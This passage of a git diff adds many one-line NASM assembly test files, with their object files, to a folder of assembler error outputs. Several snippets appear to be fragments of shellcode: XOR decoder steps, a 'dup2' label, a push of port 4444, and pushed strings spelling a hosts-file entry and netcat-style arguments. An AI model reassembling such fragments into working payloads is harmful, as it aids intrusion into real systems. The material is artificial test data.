b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_240.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_242.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_242.asm new file mode 100644 index 0000000000000000000000000000000000000000..122bcc3fa27960322814cb1e2a5886e17f360da2 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_242.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + section .bss + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_242.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_242.obj new file mode 100644 index 0000000000000000000000000000000000000000..ad4d64cbf457821783d2d12c218e6ee1fba47e19 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_242.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_245.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_245.asm new file mode 100644 index 0000000000000000000000000000000000000000..4db35e9a0f87c2e904b70b60b10b2c74ff60e55a --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_245.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov ecx, esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_245.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_245.obj new file mode 100644 index 0000000000000000000000000000000000000000..152e1356c13715fdf34c506a529236cdcbace6c8 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_245.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_247.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_247.asm new file mode 100644 index 0000000000000000000000000000000000000000..d1085b260f733e372eb9cea4966743bc91c696d6 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_247.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + db 0c6h + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_247.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_247.obj new file mode 100644 index 0000000000000000000000000000000000000000..4c51509a7d437cb10bddacc543e534eb974b4f69 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_247.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_25.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_25.asm new file mode 100644 index 0000000000000000000000000000000000000000..c24c0a1e0a17850aa0c06ce1552c359cf585ecbc --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_25.asm @@ -0,0 +1,13 @@ +section .data + +byte_tbl equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov al, [byte_tbl+2] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_25.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_25.obj new file mode 100644 index 0000000000000000000000000000000000000000..f7a7ddf2f68e78114e339f4a62516c5ff9a44d39 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_25.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_250.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_250.asm new file mode 100644 index 0000000000000000000000000000000000000000..9768af67535070f87e54633f26d2f5f0097ac3bc --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_250.asm @@ -0,0 +1,13 @@ +section .data + +decode equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jnz decode + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_250.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_250.obj new file mode 100644 index 0000000000000000000000000000000000000000..056145bc4c976a09c8c75354c7caa0697dc83c39 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_250.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_255.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_255.asm new file mode 100644 index 0000000000000000000000000000000000000000..1ed434f3ec22ac18de915ec6ab1ff8b4ec04b50b --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_255.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push ecx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_255.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_255.obj new file mode 100644 index 0000000000000000000000000000000000000000..6494a850dec47b6ed216bb9f038203ba8e3045c9 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_255.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_258.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_258.asm new file mode 100644 index 0000000000000000000000000000000000000000..aa6352b7d0488ad814740291d176669e44dfb61b --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_258.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + dup2: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_258.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_258.obj new file mode 100644 index 0000000000000000000000000000000000000000..42dd99bc60c3186a2bac13c1dc4e69552486805c Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_258.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_259.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_259.asm new file mode 100644 index 0000000000000000000000000000000000000000..c7f84a6c4c6e58ad36027b478fbff1d05bafc13e --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_259.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + three: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_259.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_259.obj new file mode 100644 index 0000000000000000000000000000000000000000..f934b184a721bdb4f139cdd6bf00e2ff5d8df0b2 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_259.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_260.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_260.asm new file mode 100644 index 0000000000000000000000000000000000000000..e91c7958a05449e28e64002f1ba101f3463bb20e --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_260.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + L1: + jmp short esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_260.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_260.obj new file mode 100644 index 0000000000000000000000000000000000000000..e21d3b1d8076b8af1be97c5af022d2d68e74c4fe Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_260.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_262.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_262.asm new file mode 100644 index 0000000000000000000000000000000000000000..e5c6711dcf684020013fdac6213dccb9ed303a9b --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_262.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + wrap_around: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_262.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_262.obj new file mode 100644 index 0000000000000000000000000000000000000000..f71c8de9b69bf339c9eb4db1c9d9f7104ce51437 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_262.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_263.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_263.asm new file mode 100644 index 0000000000000000000000000000000000000000..47efd07fa17e8d3fa78c29f574a02275188128f5 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_263.asm @@ -0,0 +1,14 @@ +section .data + +loc_402B1D equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp bl, 78h + jge short loc_402B1D + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_263.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_263.obj new file mode 100644 index 0000000000000000000000000000000000000000..4c55bc50db8b97681886d7caa3c4703c1f507387 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_263.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_265.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_265.asm new file mode 100644 index 0000000000000000000000000000000000000000..b9da2f8cebcdabfc8d2e2343803542ef9d4218ce --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_265.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push word 0x5c11 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_265.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_265.obj new file mode 100644 index 0000000000000000000000000000000000000000..b7a4299203ef41c41ba39767207071f3ea71ad84 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_265.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_266.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_266.asm new file mode 100644 index 0000000000000000000000000000000000000000..f636e1dc8b9806919541013f387af715a9a4bd91 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_266.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + read: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_266.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_266.obj new file mode 100644 index 0000000000000000000000000000000000000000..73a063a4680a1d53f6886639dd8647f661d6ee85 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_266.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_27.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_27.asm new file mode 100644 index 0000000000000000000000000000000000000000..64bdafa85a2f82e5dcffa4e0b551e07cc5128a38 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_27.asm @@ -0,0 +1,13 @@ +section .data + +y equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov ebx, [y] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_27.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_27.obj new file mode 100644 index 0000000000000000000000000000000000000000..c893a143621bd9045637c48f49b72ec515bd283d Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_27.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_270.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_270.asm new file mode 100644 index 0000000000000000000000000000000000000000..9db101f7c0659df970f41a79d879dc101260c508 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_270.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + sub edx, edx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_270.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_270.obj new file mode 100644 index 0000000000000000000000000000000000000000..c6a065dbf7dd1fc08dd5b09f216d70cfd27555fd Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_270.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_274.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_274.asm new file mode 100644 index 0000000000000000000000000000000000000000..388d623d0cf0c2a5872f6ecdd6de89539ffabefb --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_274.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cdq + push edx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_274.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_274.obj new file mode 100644 index 0000000000000000000000000000000000000000..6b16e9c51233576ae6526ab4dbb83bc83de3f43f Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_274.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_275.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_275.asm new file mode 100644 index 0000000000000000000000000000000000000000..392c8f33c74c8e578acb0b24a84e1cf3d31f6a56 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_275.asm @@ -0,0 +1,14 @@ +section .data + +encodedshellcode equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor bl, 0xaa + jne encodedshellcode + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_275.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_275.obj new file mode 100644 index 0000000000000000000000000000000000000000..50c4fb424b4657f08a6e1830af00b1ace543dfc2 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_275.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_28.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_28.asm new file mode 100644 index 0000000000000000000000000000000000000000..bff5b6821ce3982a0ea60c6818c73983ac67f170 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_28.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + duploop: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_28.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_28.obj new file mode 100644 index 0000000000000000000000000000000000000000..912b5a5a54b4021c9d8fb0a88332a3377fbc1ab5 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_28.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_280.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_280.asm new file mode 100644 index 0000000000000000000000000000000000000000..ce9854fae4454a9a47ae00882c45854f58b4c379 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_280.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor edx, edx + mov dl, 5 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_280.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_280.obj new file mode 100644 index 0000000000000000000000000000000000000000..5dc9e4bd97611cee9deca0cee145f7b1383d94b3 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_280.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_281.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_281.asm new file mode 100644 index 0000000000000000000000000000000000000000..f60fe147c641b2563c1affcd8a248b887e233323 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_281.asm @@ -0,0 +1,13 @@ +section .data + +stage equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp short stage + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_281.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_281.obj new file mode 100644 index 0000000000000000000000000000000000000000..278ee2e128f7da474e36926da827052c5e89f288 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_281.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_287.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_287.asm new file mode 100644 index 0000000000000000000000000000000000000000..a5b815e609a99249ed6cc8d52f75b261c34cbed3 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_287.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 2 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_287.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_287.obj new file mode 100644 index 0000000000000000000000000000000000000000..c7d1bb36af6a8be8d24e52368c967478e508671a Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_287.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_289.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_289.asm new file mode 100644 index 0000000000000000000000000000000000000000..d961932a6665d311602a3572f292cbf4217438ab --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_289.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push eax + pop edx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_289.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_289.obj new file mode 100644 index 0000000000000000000000000000000000000000..6a8a777a1189ba252af4b4dbcb541bb6f284ca0d Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_289.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_290.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_290.asm new file mode 100644 index 0000000000000000000000000000000000000000..93b3ed7938a28d1ff6b866f753548dcd72853753 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_290.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + message: db 'hello world!' + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_290.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_290.obj new file mode 100644 index 0000000000000000000000000000000000000000..6c1b53a7d5dfe4c44961f6f127f611cf28f67c93 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_290.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_297.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_297.asm new file mode 100644 index 0000000000000000000000000000000000000000..05a4ee808b01a3cde7eb5b3495e02f5a758caad4 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_297.asm @@ -0,0 +1,15 @@ +section .data + +notdecode equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp bl, 0xbb + je xordecode + jmp notdecode + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_3.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_3.asm new file mode 100644 index 0000000000000000000000000000000000000000..6c36651e508af70cb514d35531405f553e145623 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_3.asm @@ -0,0 +1,16 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x6d6f632e + push 0x656c676f + push 0x6f672031 + push 0x2e312e31 + push 0x2e373231 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_3.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_3.obj new file mode 100644 index 0000000000000000000000000000000000000000..b9174c82aa56e0102eeb74ec3c9fa02b761f27d9 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_3.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_305.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_305.asm new file mode 100644 index 0000000000000000000000000000000000000000..acd3143f6a2487d8d44f73b93d93406a66166c8f --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_305.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov al, 11 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_305.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_305.obj new file mode 100644 index 0000000000000000000000000000000000000000..eb4bf301331c1916ec1b496a7929292edaf580b1 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_305.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_306.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_306.asm new file mode 100644 index 0000000000000000000000000000000000000000..52301e0611327e7d45dd153ad3dcb0f50c05f069 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_306.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 15 + mov ecx, esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_306.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_306.obj new file mode 100644 index 0000000000000000000000000000000000000000..3d27d2ba1075ede5da159ddd18c0279f6d2fa6ff Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_306.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_309.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_309.asm new file mode 100644 index 0000000000000000000000000000000000000000..904ed8add0db067d45cf57d469c4a15e21f9da37 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_309.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov long [esi+26], eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_309.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_309.obj new file mode 100644 index 0000000000000000000000000000000000000000..849d2b0599e9efe59d87437aeb6222ced2324eb8 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_309.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_312.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_312.asm new file mode 100644 index 0000000000000000000000000000000000000000..151fbe99f55ad8f35e64880935c9de8e9cd5e158 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_312.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x37333333 + push 0x3170762d + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_312.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_312.obj new file mode 100644 index 0000000000000000000000000000000000000000..79e14b2ab71ceaa81b07163f990218824170bbf5 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_312.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_315.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE 